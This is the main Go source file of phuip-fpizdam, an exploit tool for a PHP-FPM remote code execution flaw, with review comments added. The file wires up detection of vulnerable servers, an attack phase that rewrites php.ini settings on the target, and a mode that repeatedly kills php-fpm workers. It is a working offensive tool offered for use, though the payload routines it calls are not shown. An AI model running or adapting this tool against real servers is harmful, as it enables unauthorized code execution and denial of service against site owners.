forked from neex/phuip-fpizdam
main.go
package main
import (
"log"
"github.com/spf13/cobra"
)
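// main parses the command line and runs one mode of the tool against the
// single URL argument. The modes are checked in a fixed order, and the first
// one that matches returns:
//
//  1. --reset-setting: call SetSetting with already-known params and stop.
//  2. --kill-workers: call KillWorkers with a known QSL and stop.
//  3. otherwise: Detect (unless --skip-detect), then Attack (unless
//     --skip-attack or --only-qsl).
//
// Every failure ends the process through log.Fatal / log.Fatalf, so the
// exit status is non-zero whenever a phase reports an error.
func main() {
	var (
		method       string
		cookie       string
		setting      string
		skipDetect   bool
		skipAttack   bool
		killWorkers  bool
		killCount    int
		resetSetting bool
		resetRetries int
		onlyQSL      bool
		// params is filled from --qsl / --pisos and, when detection runs,
		// replaced by whatever Detect returns.
		params = &AttackParams{}
	)

	cmd := &cobra.Command{
		Use:  "phuip-fpizdam [url]",
		Args: cobra.ExactArgs(1),
		Run: func(_ *cobra.Command, args []string) {
			url := args[0]

			// The method name selects an entry of the Methods table; an
			// unknown name is rejected before any request is built.
			m, ok := Methods[method]
			if !ok {
				log.Fatalf("Unknown detection method: %v", method)
			}

			requester, err := NewRequester(url, cookie)
			if err != nil {
				log.Fatalf("Failed to create requester: %v", err)
			}

			// Mode 1: reset a setting. Takes precedence over every other
			// mode flag and never runs detection.
			if resetSetting {
				if !params.Complete() {
					log.Fatal("--reset-setting requires complete params")
				}
				if setting == "" {
					// No explicit --setting: fall back to the value the
					// selected method supplies.
					setting = m.PHPOptionDisable
				}
				if resetRetries == -1 {
					// NOTE(review): the constant 1 << 32 does not fit in a
					// 32-bit int, so this assignment only compiles where
					// int is 64 bits wide.
					resetRetries = 1 << 32
				}
				if err := SetSetting(requester, params, setting, resetRetries); err != nil {
					log.Fatalf("ResetSetting() returned error: %v", err)
				}
				log.Printf("I did my best trying to set %#v", setting)
				return
			}

			// --setting is only meaningful together with --reset-setting.
			if setting != "" {
				log.Fatal("--setting requires --reset-setting")
			}

			// Mode 2: kill workers. Needs only the QSL hint and returns
			// without running Detect or Attack.
			if killWorkers {
				if params.QueryStringLength == 0 {
					log.Fatal("QSL value is required for killing workers")
				}
				// The breaking payload is 4 bytes shorter than usual (34), so we have
				// (Δ|SCRIPT_FILENAME| + Δ|REQUEST_URI| + Δ|DOCUMENT_URI|)/2 = 6.
				// This probably won't work in some configurations.
				params.QueryStringLength += 6
				if err := KillWorkers(requester, params, killCount); err != nil {
					log.Fatalf("KillWorkers() returned error: %v", err)
				}
				log.Printf("all done")
				return
			}

			// Mode 3: detection followed by the attack phase.
			if skipDetect {
				// Without detection the hints from the command line must
				// already form a complete parameter set.
				if !params.Complete() {
					log.Fatal("Got --skip-detect and attack params are incomplete, don't know what to do")
				}
				log.Printf("Using attack params %s", params)
			} else {
				var err error
				params, err = Detect(requester, m, params, onlyQSL)
				if err != nil {
					// With --only-qsl this sentinel is the expected way for
					// Detect to stop after the QSL step. The comparison is
					// by identity, so a wrapped sentinel would not match.
					if err == errPisosBruteForbidden && onlyQSL {
						log.Printf("Detect() found QSLs and that's it")
						return
					}
					log.Fatalf("Detect() returned error: %v", err)
				}
				if !params.Complete() {
					log.Fatal("Detect() returned incomplete attack params, something gone wrong")
				}
				log.Printf("Detect() returned attack params: %s <-- REMEMBER THIS", params)
			}

			if skipAttack || onlyQSL {
				log.Print("Attack phase is disabled, so that's it")
				return
			}

			if err := Attack(requester, params); err != nil {
				log.Fatalf("Attack returned error: %v", err)
			}
		},
	}

	flags := cmd.Flags()
	flags.StringVar(&method, "method", "session.auto_start", "detect method (see detect_methods.go)")
	flags.StringVar(&cookie, "cookie", "", "send this cookie")
	flags.IntVar(&params.QueryStringLength, "qsl", 0, "qsl hint")
	flags.IntVar(&params.PisosLength, "pisos", 0, "pisos hint")
	flags.BoolVar(&skipDetect, "skip-detect", false, "skip detection phase")
	flags.BoolVar(&skipAttack, "skip-attack", false, "skip attack phase")
	flags.BoolVar(&onlyQSL, "only-qsl", false, "stop after QSL detection, use this if you just want to check if the server is vulnerable")
	flags.BoolVar(&resetSetting, "reset-setting", false, "try to reset setting (requires attack params)")
	flags.IntVar(&resetRetries, "reset-retries", SettingEnableRetries, "how many retries to do for --reset-setting, -1 means 2**32")
	flags.StringVar(&setting, "setting", "", "specify custom php.ini setting for --reset-setting")
	flags.BoolVar(&killWorkers, "kill-workers", false, "just kill php-fpm workers (requires only QSL)")
	flags.IntVar(&killCount, "kill-count", SettingEnableRetries, "how many times to send the worker killing payload")

	if err := cmd.Execute(); err != nil {
		log.Fatal(err)
	}
}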